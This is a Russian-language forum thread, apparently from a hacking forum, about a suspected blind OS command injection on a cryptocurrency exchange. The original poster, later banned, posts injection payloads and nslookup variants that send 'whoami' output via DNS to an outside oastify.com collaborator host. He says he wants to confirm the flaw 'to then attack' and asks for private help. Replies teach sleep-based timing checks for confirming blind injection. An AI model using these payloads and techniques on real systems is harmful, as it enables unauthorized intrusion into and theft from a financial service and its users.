• XSS.stack #1 – первый литературный журнал от юзеров форума

OS command injection

MLeak

RAM
Забанен
Регистрация
12.06.2023
Сообщения
125
Реакции
26
Гарант сделки
6
Пожалуйста, обратите внимание, что пользователь заблокирован
Нужна помощь. на одной из бирж криптовалюты нашел.
OS command injection

Issue detail​

The Type parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was executed.

The payload &nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&'\"`0&nslookup -q=cname rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.&`' was submitted in the Type parameter. The application performed a DNS lookup for the specified domain name.

Я создаю collaborator payload и меняю конечно пейлоад на тот который дал, потом в браузер. Но ничего не приходить на бурп.
Делал по разному, чтобы узнать whoami
nslookup whoami rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup 'whoami' rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami.rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
nslookup whoami .rwriz7kkp8ognly6rq6f2wm0srykmmahy8lz9o.oastify.com.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ёмаё , специалисты рце вы где ? в чем трабла?
 
Я создаю collaborator payload и меняю конечно пейлоад на тот который дал, потом в браузер. Но ничего не приходить на бурп.
не совсем понятно ты рассписал....ты скорее всего нашёл это через окуня ?!?!?
Ту нагрузку которую он тебе дал, ты засовывал в бурп ? отрабатывает или нет?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
не совсем понятно ты рассписал....ты скорее всего нашёл это через окуня ?!?!?
Ту нагрузку которую он тебе дал, ты засовывал в бурп ? отрабатывает или нет?
через бурп нашел и в бурпе нагрузку делал и в браузере делал, но другой ответ дает , не 200.
p.s. он должен мне ответ дать через днс в колабаратор бурпа, но нету
биржа большая
 
Пожалуйста, обратите внимание, что пользователь заблокирован
попробуй sleep сделать, пауза есть ?
поподробнее...) и зачем паузу? чет вообще не понял
 
скорее всего это фальш позитив , команд инж в поле тайп это маловероятно . Бурп постоянно фальш позитив кидает. попробуй sleep 10 в параметр этот пихнуть и считай секунды до ответа
 
Пожалуйста, обратите внимание, что пользователь заблокирован
скорее всего это фальш позитив , команд инж в поле тайп это маловероятно . Бурп постоянно фальш позитив кидает. попробуй sleep 10 в параметр этот пихнуть и считай секунды до ответа
не только в type нашел и вдругих параметрах тоже
не могу понять что за слиип 10, это как? это не скуля!
 
не только в type нашел и вдругих параметрах тоже
не могу понять что за слиип 10, это как? это не скуля
команд инж это исполнение команд ос . слип это команда оси
 
Пожалуйста, обратите внимание, что пользователь заблокирован
команд инж это исполнение команд ос . слип это команда оси
Дык не срабатывает ничего)))) хоть какую команду вписывай. Я поэтому и инетересуюсь в чем трабл. Но бурп упорно ищет это уязвимость повторно и повторно в нескольких параметрах, а я хочу сам убедиться еще сперва , чтобы потом уже атаковать
п.с. в лс скинь жаб в привноте
 
Дык не срабатывает ничего)))) хоть какую команду вписывай. Я поэтому и инетересуюсь в чем трабл. Но бурп упорно ищет это уязвимость повторно и повторно в нескольких параметрах, а я хочу сам убедиться еще сперва , чтобы потом уже атаковать
п.с. в лс скинь жаб в привноте
нет там скорее всего уязвимости . бурп наебывает. бурп просто сует этот же слип во все параметры и если есть задержка воет об инъекции . а задержка обычно изза того что инет лаганул или сайт нагружен. Бурп же тебе написал с каким пэйлоадом он определил этот инж? Протести его еще раз и проверь. А вообще автосканерами криптобиржи пробивать это вообще бессмыслено. До тебя там уже тысяча индусов прошла с какого-нибудь багбаунти
 
Пожалуйста, обратите внимание, что пользователь заблокирован
нет там скорее всего уязвимости . бурп наебывает. бурп просто сует этот же слип во все параметры и если есть задержка воет об инъекции . а задержка обычно изза того что инет лаганул или сайт нагружен. Бурп же тебе написал с каким пэйлоадом он определил этот инж? Протести его еще раз и проверь. А вообще автосканерами криптобиржи пробивать это вообще бессмыслено. До тебя там уже тысяча индусов прошла с какого-нибудь багбаунти
Дык тестил несколько раз и повторно находит
 
Дык тестил несколько раз и повторно находит
руками проверь, сделай слип 100 например и замерь через сколько ответит или проверяй меняется ли задержка от передаваеиого времени ,типа передал слип 10,потом слип 20
 
поподробнее...) и зачем паузу? чет вообще не понял
обычно просиваешь sleep и смотришь есть ли пауза...
 
не только в type нашел и вдругих параметрах тоже
не могу понять что за слиип 10, это как? это не скуля!
он про то что в любом терминале bash оболочке и прочих есть команда sleep которая задерживает на N время эту команду после того как N количество секунд проходят команда исполняеется.
Типо как
Код:
echo 'PoSiTiVeH4cKM3' | sleep 10
И команда задержится на 10 секунд, так-же самое с твоим payload
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Это понял, кто может помочь разобраться с биржей?) в пм
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх